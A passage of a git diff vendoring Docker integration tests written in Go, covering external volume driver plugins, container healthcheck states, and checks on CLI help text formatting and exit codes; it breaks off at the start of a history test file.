0644) + c.Assert(err, checker.IsNil) + return s +} + +func (s *DockerExternalVolumeSuite) TearDownSuite(c *check.C) { + s.volumePlugin.Close() + + err := os.RemoveAll("/etc/docker/plugins") + c.Assert(err, checker.IsNil) +} + +func (s *DockerExternalVolumeSuite) TestVolumeCLICreateOptionConflict(c *check.C) { + dockerCmd(c, "volume", "create", "test") + + out, _, err := dockerCmdWithError("volume", "create", "test", "--driver", volumePluginName) + c.Assert(err, check.NotNil, check.Commentf("volume create exception name already in use with another driver")) + c.Assert(out, checker.Contains, "A volume named test already exists") + + out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Driver }}", "test") + _, _, err = dockerCmdWithError("volume", "create", "test", "--driver", strings.TrimSpace(out)) + c.Assert(err, check.IsNil) + + // make sure hidden --name option conflicts with positional arg name + out, _, err = dockerCmdWithError("volume", "create", "--name", "test2", "test2") + c.Assert(err, check.NotNil, check.Commentf("Conflicting options: either specify --name or provide positional arg, not both")) +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverNamed(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("run", "--rm", "--name", "test-data", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, s.Server.URL) + + _, err = s.d.Cmd("volume", "rm", "external-volume-test") + c.Assert(err, checker.IsNil) + + p := hostVolumePath("external-volume-test") + _, err = os.Lstat(p) + c.Assert(err, checker.NotNil) + c.Assert(os.IsNotExist(err), checker.True, check.Commentf("Expected volume path in host to not exist: %s, %v\n", p, err)) + + c.Assert(s.ec.activations, checker.Equals, 1) + c.Assert(s.ec.creations, checker.Equals, 1) + c.Assert(s.ec.removals, checker.Equals, 1) + c.Assert(s.ec.mounts, checker.Equals, 1) + c.Assert(s.ec.unmounts, checker.Equals, 1) +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnnamed(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("run", "--rm", "--name", "test-data", "-v", "/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, s.Server.URL) + + c.Assert(s.ec.activations, checker.Equals, 1) + c.Assert(s.ec.creations, checker.Equals, 1) + c.Assert(s.ec.removals, checker.Equals, 1) + c.Assert(s.ec.mounts, checker.Equals, 1) + c.Assert(s.ec.unmounts, checker.Equals, 1) +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverVolumesFrom(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("run", "--name", "vol-test1", "-v", "/foo", "--volume-driver", volumePluginName, "busybox:latest") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("run", "--rm", "--volumes-from", "vol-test1", "--name", "vol-test2", "busybox", "ls", "/tmp") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("rm", "-fv", "vol-test1") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + c.Assert(s.ec.activations, checker.Equals, 1) + c.Assert(s.ec.creations, checker.Equals, 1) + c.Assert(s.ec.removals, checker.Equals, 1) + c.Assert(s.ec.mounts, checker.Equals, 2) + c.Assert(s.ec.unmounts, checker.Equals, 2) +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverDeleteContainer(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("run", "--name", "vol-test1", "-v", "/foo", "--volume-driver", volumePluginName, "busybox:latest") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("rm", "-fv", "vol-test1") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + c.Assert(s.ec.activations, checker.Equals, 1) + c.Assert(s.ec.creations, checker.Equals, 1) + c.Assert(s.ec.removals, checker.Equals, 1) + c.Assert(s.ec.mounts, checker.Equals, 1) + c.Assert(s.ec.unmounts, checker.Equals, 1) +} + +func hostVolumePath(name string) string { + return fmt.Sprintf("/var/lib/docker/volumes/%s", name) +} + +// Make sure a request to use a down driver doesn't block other requests +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverLookupNotBlocked(c *check.C) { + specPath := "/etc/docker/plugins/down-driver.spec" + err := ioutil.WriteFile(specPath, []byte("tcp://127.0.0.7:9999"), 0644) + c.Assert(err, check.IsNil) + defer os.RemoveAll(specPath) + + chCmd1 := make(chan struct{}) + chCmd2 := make(chan error) + cmd1 := exec.Command(dockerBinary, "volume", "create", "-d", "down-driver") + cmd2 := exec.Command(dockerBinary, "volume", "create") + + c.Assert(cmd1.Start(), checker.IsNil) + defer cmd1.Process.Kill() + time.Sleep(100 * time.Millisecond) // ensure API has been called + c.Assert(cmd2.Start(), checker.IsNil) + + go func() { + cmd1.Wait() + close(chCmd1) + }() + go func() { + chCmd2 <- cmd2.Wait() + }() + + select { + case <-chCmd1: + cmd2.Process.Kill() + c.Fatalf("volume create with down driver finished unexpectedly") + case err := <-chCmd2: + c.Assert(err, checker.IsNil) + case <-time.After(5 * time.Second): + cmd2.Process.Kill() + c.Fatal("volume creates are blocked by previous create requests when previous driver is down") + } +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverRetryNotImmediatelyExists(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + specPath := "/etc/docker/plugins/test-external-volume-driver-retry.spec" + os.RemoveAll(specPath) + defer os.RemoveAll(specPath) + + errchan := make(chan error) + go func() { + if out, err := s.d.Cmd("run", "--rm", "--name", "test-data-retry", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", "test-external-volume-driver-retry", "busybox:latest"); err != nil { + errchan <- fmt.Errorf("%v:\n%s", err, out) + } + close(errchan) + }() + go func() { + // wait for a retry to occur, then create spec to allow plugin to register + time.Sleep(2000 * time.Millisecond) + // no need to check for an error here since it will get picked up by the timeout later + ioutil.WriteFile(specPath, []byte(s.Server.URL), 0644) + }() + + select { + case err := <-errchan: + c.Assert(err, checker.IsNil) + case <-time.After(8 * time.Second): + c.Fatal("volume creates fail when plugin not immediately available") + } + + _, err = s.d.Cmd("volume", "rm", "external-volume-test") + c.Assert(err, checker.IsNil) + + c.Assert(s.ec.activations, checker.Equals, 1) + c.Assert(s.ec.creations, checker.Equals, 1) + c.Assert(s.ec.removals, checker.Equals, 1) + c.Assert(s.ec.mounts, checker.Equals, 1) + c.Assert(s.ec.unmounts, checker.Equals, 1) +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverBindExternalVolume(c *check.C) { + dockerCmd(c, "volume", "create", "-d", volumePluginName, "foo") + dockerCmd(c, "run", "-d", "--name", "testing", "-v", "foo:/bar", "busybox", "top") + + var mounts []struct { + Name string + Driver string + } + out := inspectFieldJSON(c, "testing", "Mounts") + c.Assert(json.NewDecoder(strings.NewReader(out)).Decode(&mounts), checker.IsNil) + c.Assert(len(mounts), checker.Equals, 1, check.Commentf(out)) + c.Assert(mounts[0].Name, checker.Equals, "foo") + c.Assert(mounts[0].Driver, checker.Equals, volumePluginName) +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverList(c *check.C) { + dockerCmd(c, "volume", "create", "-d", volumePluginName, "abc3") + out, _ := dockerCmd(c, "volume", "ls") + ls := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(ls), check.Equals, 2, check.Commentf("\n%s", out)) + + vol := strings.Fields(ls[len(ls)-1]) + c.Assert(len(vol), check.Equals, 2, check.Commentf("%v", vol)) + c.Assert(vol[0], check.Equals, volumePluginName) + c.Assert(vol[1], check.Equals, "abc3") + + c.Assert(s.ec.lists, check.Equals, 1) +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverGet(c *check.C) { + out, _, err := dockerCmdWithError("volume", "inspect", "dummy") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "No such volume") + c.Assert(s.ec.gets, check.Equals, 1) + + dockerCmd(c, "volume", "create", "test", "-d", volumePluginName) + out, _ = dockerCmd(c, "volume", "inspect", "test") + + type vol struct { + Status map[string]string + } + var st []vol + + c.Assert(json.Unmarshal([]byte(out), &st), checker.IsNil) + c.Assert(st, checker.HasLen, 1) + c.Assert(st[0].Status, checker.HasLen, 1, check.Commentf("%v", st[0])) + c.Assert(st[0].Status["Hello"], checker.Equals, "world", check.Commentf("%v", st[0].Status)) +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverWithDaemonRestart(c *check.C) { + dockerCmd(c, "volume", "create", "-d", volumePluginName, "abc1") + err := s.d.Restart() + c.Assert(err, checker.IsNil) + + dockerCmd(c, "run", "--name=test", "-v", "abc1:/foo", "busybox", "true") + var mounts []types.MountPoint + inspectFieldAndMarshall(c, "test", "Mounts", &mounts) + c.Assert(mounts, checker.HasLen, 1) + c.Assert(mounts[0].Driver, checker.Equals, volumePluginName) +} + +// Ensures that the daemon handles when the plugin responds to a `Get` request with a null volume and a null error. +// Prior the daemon would panic in this scenario. +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverGetEmptyResponse(c *check.C) { + c.Assert(s.d.Start(), checker.IsNil) + + out, err := s.d.Cmd("volume", "create", "-d", volumePluginName, "abc2", "--opt", "ninja=1") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("volume", "inspect", "abc2") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "No such volume") +} + +// Ensure only cached paths are used in volume list to prevent N+1 calls to `VolumeDriver.Path` +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverPathCalls(c *check.C) { + c.Assert(s.d.Start(), checker.IsNil) + c.Assert(s.ec.paths, checker.Equals, 0) + + out, err := s.d.Cmd("volume", "create", "test", "--driver=test-external-volume-driver") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(s.ec.paths, checker.Equals, 1) + + out, err = s.d.Cmd("volume", "ls") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(s.ec.paths, checker.Equals, 1) + + out, err = s.d.Cmd("volume", "inspect", "--format='{{.Mountpoint}}'", "test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + c.Assert(s.ec.paths, checker.Equals, 1) +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverMountID(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("run", "--rm", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") +} + +// Check that VolumeDriver.Capabilities gets called, and only called once +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverCapabilities(c *check.C) { + c.Assert(s.d.Start(), checker.IsNil) + c.Assert(s.ec.caps, checker.Equals, 0) + + for i := 0; i < 3; i++ { + out, err := s.d.Cmd("volume", "create", "-d", volumePluginName, fmt.Sprintf("test%d", i)) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(s.ec.caps, checker.Equals, 1) + out, err = s.d.Cmd("volume", "inspect", "--format={{.Scope}}", fmt.Sprintf("test%d", i)) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, volume.GlobalScope) + } +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverOutOfBandDelete(c *check.C) { + driverName := stringid.GenerateNonCryptoID() + p := newVolumePlugin(c, driverName) + defer p.Close() + + c.Assert(s.d.StartWithBusybox(), checker.IsNil) + + out, err := s.d.Cmd("volume", "create", "-d", driverName, "--name", "test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("volume", "create", "-d", "local", "--name", "test") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "volume named test already exists") + + // simulate out of band volume deletion on plugin level + delete(p.vols, "test") + + // test re-create with same driver + out, err = s.d.Cmd("volume", "create", "-d", driverName, "--opt", "foo=bar", "--name", "test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + out, err = s.d.Cmd("volume", "inspect", "test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + var vs []types.Volume + err = json.Unmarshal([]byte(out), &vs) + c.Assert(err, checker.IsNil) + c.Assert(vs, checker.HasLen, 1) + c.Assert(vs[0].Driver, checker.Equals, driverName) + c.Assert(vs[0].Options, checker.NotNil) + c.Assert(vs[0].Options["foo"], checker.Equals, "bar") + c.Assert(vs[0].Driver, checker.Equals, driverName) + + // simulate out of band volume deletion on plugin level + delete(p.vols, "test") + + // test create with different driver + out, err = s.d.Cmd("volume", "create", "-d", "local", "--name", "test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("volume", "inspect", "test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + vs = nil + err = json.Unmarshal([]byte(out), &vs) + c.Assert(err, checker.IsNil) + c.Assert(vs, checker.HasLen, 1) + c.Assert(vs[0].Options, checker.HasLen, 0) + c.Assert(vs[0].Driver, checker.Equals, "local") +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnmountOnMountFail(c *check.C) { + c.Assert(s.d.StartWithBusybox(), checker.IsNil) + s.d.Cmd("volume", "create", "-d", "test-external-volume-driver", "--opt=invalidOption=1", "--name=testumount") + + out, _ := s.d.Cmd("run", "-v", "testumount:/foo", "busybox", "true") + c.Assert(s.ec.unmounts, checker.Equals, 0, check.Commentf(out)) + out, _ = s.d.Cmd("run", "-w", "/foo", "-v", "testumount:/foo", "busybox", "true") + c.Assert(s.ec.unmounts, checker.Equals, 0, check.Commentf(out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go new file mode 100644 index 0000000000..6b7baebd00 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go @@ -0,0 +1,169 @@ +package main + +import ( + "encoding/json" + + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func waitForStatus(c *check.C, name string, prev string, expected string) { + prev = prev + "\n" + expected = expected + "\n" + for { + out, _ := dockerCmd(c, "inspect", "--format={{.State.Status}}", name) + if out == expected { + return + } + c.Check(out, checker.Equals, prev) + if out != prev { + return + } + time.Sleep(100 * time.Millisecond) + } +} + +func waitForHealthStatus(c *check.C, name string, prev string, expected string) { + prev = prev + "\n" + expected = expected + "\n" + for { + out, _ := dockerCmd(c, "inspect", "--format={{.State.Health.Status}}", name) + if out == expected { + return + } + c.Check(out, checker.Equals, prev) + if out != prev { + return + } + time.Sleep(100 * time.Millisecond) + } +} + +func getHealth(c *check.C, name string) *types.Health { + out, _ := dockerCmd(c, "inspect", "--format={{json .State.Health}}", name) + var health types.Health + err := json.Unmarshal([]byte(out), &health) + c.Check(err, checker.Equals, nil) + return &health +} + +func (s *DockerSuite) TestHealth(c *check.C) { + testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows + + imageName := "testhealth" + _, err := buildImage(imageName, + `FROM busybox + RUN echo OK > /status + CMD ["/bin/sleep", "120"] + STOPSIGNAL SIGKILL + HEALTHCHECK --interval=1s --timeout=30s \ + CMD cat /status`, + true) + + c.Check(err, check.IsNil) + + // No health status before starting + name := "test_health" + dockerCmd(c, "create", "--name", name, imageName) + out, _ := dockerCmd(c, "ps", "-a", "--format={{.Status}}") + c.Check(out, checker.Equals, "Created\n") + + // Inspect the options + out, _ = dockerCmd(c, "inspect", + "--format=timeout={{.Config.Healthcheck.Timeout}} "+ + "interval={{.Config.Healthcheck.Interval}} "+ + "retries={{.Config.Healthcheck.Retries}} "+ + "test={{.Config.Healthcheck.Test}}", name) + c.Check(out, checker.Equals, "timeout=30s interval=1s retries=0 test=[CMD-SHELL cat /status]\n") + + // Start + dockerCmd(c, "start", name) + waitForHealthStatus(c, name, "starting", "healthy") + + // Make it fail + dockerCmd(c, "exec", name, "rm", "/status") + waitForHealthStatus(c, name, "healthy", "unhealthy") + + // Inspect the status + out, _ = dockerCmd(c, "inspect", "--format={{.State.Health.Status}}", name) + c.Check(out, checker.Equals, "unhealthy\n") + + // Make it healthy again + dockerCmd(c, "exec", name, "touch", "/status") + waitForHealthStatus(c, name, "unhealthy", "healthy") + + // Remove container + dockerCmd(c, "rm", "-f", name) + + // Disable the check from the CLI + out, _ = dockerCmd(c, "create", "--name=noh", "--no-healthcheck", imageName) + out, _ = dockerCmd(c, "inspect", "--format={{.Config.Healthcheck.Test}}", "noh") + c.Check(out, checker.Equals, "[NONE]\n") + dockerCmd(c, "rm", "noh") + + // Disable the check with a new build + _, err = buildImage("no_healthcheck", + `FROM testhealth + HEALTHCHECK NONE`, true) + c.Check(err, check.IsNil) + + out, _ = dockerCmd(c, "inspect", "--format={{.ContainerConfig.Healthcheck.Test}}", "no_healthcheck") + c.Check(out, checker.Equals, "[NONE]\n") + + // Enable the checks from the CLI + _, _ = dockerCmd(c, "run", "-d", "--name=fatal_healthcheck", + "--health-interval=0.5s", + "--health-retries=3", + "--health-cmd=cat /status", + "no_healthcheck") + waitForHealthStatus(c, "fatal_healthcheck", "starting", "healthy") + health := getHealth(c, "fatal_healthcheck") + c.Check(health.Status, checker.Equals, "healthy") + c.Check(health.FailingStreak, checker.Equals, 0) + last := health.Log[len(health.Log)-1] + c.Check(last.ExitCode, checker.Equals, 0) + c.Check(last.Output, checker.Equals, "OK\n") + + // Fail the check + dockerCmd(c, "exec", "fatal_healthcheck", "rm", "/status") + waitForHealthStatus(c, "fatal_healthcheck", "healthy", "unhealthy") + + failsStr, _ := dockerCmd(c, "inspect", "--format={{.State.Health.FailingStreak}}", "fatal_healthcheck") + fails, err := strconv.Atoi(strings.TrimSpace(failsStr)) + c.Check(err, check.IsNil) + c.Check(fails >= 3, checker.Equals, true) + dockerCmd(c, "rm", "-f", "fatal_healthcheck") + + // Check timeout + // Note: if the interval is too small, it seems that Docker spends all its time running health + // checks and never gets around to killing it. + _, _ = dockerCmd(c, "run", "-d", "--name=test", + "--health-interval=1s", "--health-cmd=sleep 5m", "--health-timeout=1ms", imageName) + waitForHealthStatus(c, "test", "starting", "unhealthy") + health = getHealth(c, "test") + last = health.Log[len(health.Log)-1] + c.Check(health.Status, checker.Equals, "unhealthy") + c.Check(last.ExitCode, checker.Equals, -1) + c.Check(last.Output, checker.Equals, "Health check exceeded timeout (1ms)") + dockerCmd(c, "rm", "-f", "test") + + // Check JSON-format + _, err = buildImage(imageName, + `FROM busybox + RUN echo OK > /status + CMD ["/bin/sleep", "120"] + STOPSIGNAL SIGKILL + HEALTHCHECK --interval=1s --timeout=30s \ + CMD ["cat", "/my status"]`, + true) + c.Check(err, check.IsNil) + out, _ = dockerCmd(c, "inspect", + "--format={{.Config.Healthcheck.Test}}", imageName) + c.Check(out, checker.Equals, "[CMD cat /my status]\n") + +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go new file mode 100644 index 0000000000..29b6553fc5 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go @@ -0,0 +1,321 @@ +package main + +import ( + "fmt" + "os/exec" + "runtime" + "strings" + "unicode" + + "github.com/docker/docker/pkg/homedir" + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestHelpTextVerify(c *check.C) { + testRequires(c, DaemonIsLinux) + + // Make sure main help text fits within 80 chars and that + // on non-windows system we use ~ when possible (to shorten things). + // Test for HOME set to its default value and set to "/" on linux + // Yes on windows setting up an array and looping (right now) isn't + // necessary because we just have one value, but we'll need the + // array/loop on linux so we might as well set it up so that we can + // test any number of home dirs later on and all we need to do is + // modify the array - the rest of the testing infrastructure should work + homes := []string{homedir.Get()} + + // Non-Windows machines need to test for this special case of $HOME + if runtime.GOOS != "windows" { + homes = append(homes, "/") + } + + homeKey := homedir.Key() + baseEnvs := appendBaseEnv(true) + + // Remove HOME env var from list so we can add a new value later. + for i, env := range baseEnvs { + if strings.HasPrefix(env, homeKey+"=") { + baseEnvs = append(baseEnvs[:i], baseEnvs[i+1:]...) + break + } + } + + for _, home := range homes { + + // Dup baseEnvs and add our new HOME value + newEnvs := make([]string, len(baseEnvs)+1) + copy(newEnvs, baseEnvs) + newEnvs[len(newEnvs)-1] = homeKey + "=" + home + + scanForHome := runtime.GOOS != "windows" && home != "/" + + // Check main help text to make sure its not over 80 chars + helpCmd := exec.Command(dockerBinary, "help") + helpCmd.Env = newEnvs + out, _, err := runCommandWithOutput(helpCmd) + c.Assert(err, checker.IsNil, check.Commentf(out)) + lines := strings.Split(out, "\n") + for _, line := range lines { + // All lines should not end with a space + c.Assert(line, checker.Not(checker.HasSuffix), " ", check.Commentf("Line should not end with a space")) + + if scanForHome && strings.Contains(line, `=`+home) { + c.Fatalf("Line should use '%q' instead of %q:\n%s", homedir.GetShortcutString(), home, line) + } + if runtime.GOOS != "windows" { + i := strings.Index(line, homedir.GetShortcutString()) + if i >= 0 && i != len(line)-1 && line[i+1] != '/' { + c.Fatalf("Main help should not have used home shortcut:\n%s", line) + } + } + } + + // Make sure each cmd's help text fits within 90 chars and that + // on non-windows system we use ~ when possible (to shorten things). + // Pull the list of commands from the "Commands:" section of docker help + helpCmd = exec.Command(dockerBinary, "help") + helpCmd.Env = newEnvs + out, _, err = runCommandWithOutput(helpCmd) + c.Assert(err, checker.IsNil, check.Commentf(out)) + i := strings.Index(out, "Commands:") + c.Assert(i, checker.GreaterOrEqualThan, 0, check.Commentf("Missing 'Commands:' in:\n%s", out)) + + cmds := []string{} + // Grab all chars starting at "Commands:" + helpOut := strings.Split(out[i:], "\n") + // Skip first line, it is just "Commands:" + helpOut = helpOut[1:] + + // Create the list of commands we want to test + cmdsToTest := []string{} + for _, cmd := range helpOut { + // Stop on blank line or non-idented line + if cmd == "" || !unicode.IsSpace(rune(cmd[0])) { + break + } + + // Grab just the first word of each line + cmd = strings.Split(strings.TrimSpace(cmd), " ")[0] + cmds = append(cmds, cmd) // Saving count for later + + cmdsToTest = append(cmdsToTest, cmd) + } + + // Add some 'two word' commands - would be nice to automatically + // calculate this list - somehow + cmdsToTest = append(cmdsToTest, "volume create") + cmdsToTest = append(cmdsToTest, "volume inspect") + cmdsToTest = append(cmdsToTest, "volume ls") + cmdsToTest = append(cmdsToTest, "volume rm") + cmdsToTest = append(cmdsToTest, "network connect") + cmdsToTest = append(cmdsToTest, "network create") + cmdsToTest = append(cmdsToTest, "network disconnect") + cmdsToTest = append(cmdsToTest, "network inspect") + cmdsToTest = append(cmdsToTest, "network ls") + cmdsToTest = append(cmdsToTest, "network rm") + + if experimentalDaemon { + cmdsToTest = append(cmdsToTest, "checkpoint create") + cmdsToTest = append(cmdsToTest, "checkpoint ls") + cmdsToTest = append(cmdsToTest, "checkpoint rm") + } + + // Divide the list of commands into go routines and run the func testcommand on the commands in parallel + // to save runtime of test + + errChan := make(chan error) + + for index := 0; index < len(cmdsToTest); index++ { + go func(index int) { + errChan <- testCommand(cmdsToTest[index], newEnvs, scanForHome, home) + }(index) + } + + for index := 0; index < len(cmdsToTest); index++ { + err := <-errChan + if err != nil { + c.Fatal(err) + } + } + } +} + +func (s *DockerSuite) TestHelpExitCodesHelpOutput(c *check.C) { + // Test to make sure the exit code and output (stdout vs stderr) of + // various good and bad cases are what we expect + + // docker : stdout=all, stderr=empty, rc=0 + out, _, err := dockerCmdWithError() + c.Assert(err, checker.IsNil, check.Commentf(out)) + // Be really pick + c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker'\n")) + + // docker help: stdout=all, stderr=empty, rc=0 + out, _, err = dockerCmdWithError("help") + c.Assert(err, checker.IsNil, check.Commentf(out)) + // Be really pick + c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker help'\n")) + + // docker --help: stdout=all, stderr=empty, rc=0 + out, _, err = dockerCmdWithError("--help") + c.Assert(err, checker.IsNil, check.Commentf(out)) + // Be really pick + c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker --help'\n")) + + // docker inspect busybox: stdout=all, stderr=empty, rc=0 + // Just making sure stderr is empty on valid cmd + out, _, err = dockerCmdWithError("inspect", "busybox") + c.Assert(err, checker.IsNil, check.Commentf(out)) + // Be really pick + c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker inspect busyBox'\n")) + + // docker rm: stdout=empty, stderr=all, rc!=0 + // testing the min arg error msg + cmd := exec.Command(dockerBinary, "rm") + stdout, stderr, _, err := runCommandWithStdoutStderr(cmd) + c.Assert(err, checker.NotNil) + c.Assert(stdout, checker.Equals, "") + // Should not contain full help text but should contain info about + // # of args and Usage line + c.Assert(stderr, checker.Contains, "requires at least 1 argument", check.Commentf("Missing # of args text from 'docker rm'\n")) + + // docker rm NoSuchContainer: stdout=empty, stderr=all, rc=0 + // testing to make sure no blank line on error + cmd = exec.Command(dockerBinary, "rm", "NoSuchContainer") + stdout, stderr, _, err = runCommandWithStdoutStderr(cmd) + c.Assert(err, checker.NotNil) + c.Assert(len(stderr), checker.Not(checker.Equals), 0) + c.Assert(stdout, checker.Equals, "") + // Be really picky + c.Assert(stderr, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker rm'\n")) + + // docker BadCmd: stdout=empty, stderr=all, rc=0 + cmd = exec.Command(dockerBinary, "BadCmd") + stdout, stderr, _, err = runCommandWithStdoutStderr(cmd) + c.Assert(err, checker.NotNil) + c.Assert(stdout, checker.Equals, "") + c.Assert(stderr, checker.Equals, "docker: 'BadCmd' is not a docker command.\nSee 'docker --help'\n", check.Commentf("Unexcepted output for 'docker badCmd'\n")) +} + +func testCommand(cmd string, newEnvs []string, scanForHome bool, home string) error { + + args := strings.Split(cmd+" --help", " ") + + // Check the full usage text + helpCmd := exec.Command(dockerBinary, args...) + helpCmd.Env = newEnvs + out, stderr, _, err := runCommandWithStdoutStderr(helpCmd) + if len(stderr) != 0 { + return fmt.Errorf("Error on %q help. non-empty stderr:%q\n", cmd, stderr) + } + if strings.HasSuffix(out, "\n\n") { + return fmt.Errorf("Should not have blank line on %q\n", cmd) + } + if !strings.Contains(out, "--help") { + return fmt.Errorf("All commands should mention '--help'. Command '%v' did not.\n", cmd) + } + + if err != nil { + return fmt.Errorf(out) + } + + // Check each line for lots of stuff + lines := strings.Split(out, "\n") + for _, line := range lines { + i := strings.Index(line, "~") + if i >= 0 && i != len(line)-1 && line[i+1] != '/' { + return fmt.Errorf("Help for %q should not have used ~:\n%s", cmd, line) + } + + // If a line starts with 4 spaces then assume someone + // added a multi-line description for an option and we need + // to flag it + if strings.HasPrefix(line, " ") && + !strings.HasPrefix(strings.TrimLeft(line, " "), "--") { + return fmt.Errorf("Help for %q should not have a multi-line option", cmd) + } + + // Options should NOT end with a period + if strings.HasPrefix(line, " -") && strings.HasSuffix(line, ".") { + return fmt.Errorf("Help for %q should not end with a period: %s", cmd, line) + } + + // Options should NOT end with a space + if strings.HasSuffix(line, " ") { + return fmt.Errorf("Help for %q should not end with a space: %s", cmd, line) + } + + } + + // For each command make sure we generate an error + // if we give a bad arg + args = strings.Split(cmd+" --badArg", " ") + + out, _, err = dockerCmdWithError(args...) + if err == nil { + return fmt.Errorf(out) + } + + // Be really picky + if strings.HasSuffix(stderr, "\n\n") { + return fmt.Errorf("Should not have a blank line at the end of 'docker rm'\n") + } + + // Now make sure that each command will print a short-usage + // (not a full usage - meaning no opts section) if we + // are missing a required arg or pass in a bad arg + + // These commands will never print a short-usage so don't test + noShortUsage := map[string]string{ + "images": "", + "login": "", + "logout": "", + "network": "", + "stats": "", + "volume create": "", + } + + if _, ok := noShortUsage[cmd]; !ok { + // skipNoArgs are ones that we don't want to try w/o + // any args. Either because it'll hang the test or + // lead to incorrect test result (like false negative). + // Whatever the reason, skip trying to run w/o args and + // jump to trying with a bogus arg. + skipNoArgs := map[string]struct{}{ + "daemon": {}, + "events": {}, + "load": {}, + } + + var result *icmd.Result + if _, ok := skipNoArgs[cmd]; !ok { + result = dockerCmdWithResult(strings.Split(cmd, " ")...) + } + + // If its ok w/o any args then try again with an arg + if result == nil || result.ExitCode == 0 { + result = dockerCmdWithResult(strings.Split(cmd+" badArg", " ")...) + } + + if err := result.Compare(icmd.Expected{ + Out: icmd.None, + Err: "\nUsage:", + ExitCode: 1, + }); err != nil { + return err + } + + stderr := result.Stderr() + // Shouldn't have full usage + if strings.Contains(stderr, "--help=false") { + return fmt.Errorf("Should not have full usage on %q:%v", result.Cmd.Args, stderr) + } + if strings.HasSuffix(stderr, "\n\n") { + return fmt.Errorf("Should not have a blank line on %q\n%v", result.Cmd.Args, stderr) + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go new file mode 100644 index 0000000000..9979080b1c --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_history_test.go @@ -0,0 +1,121 @@ +package main + 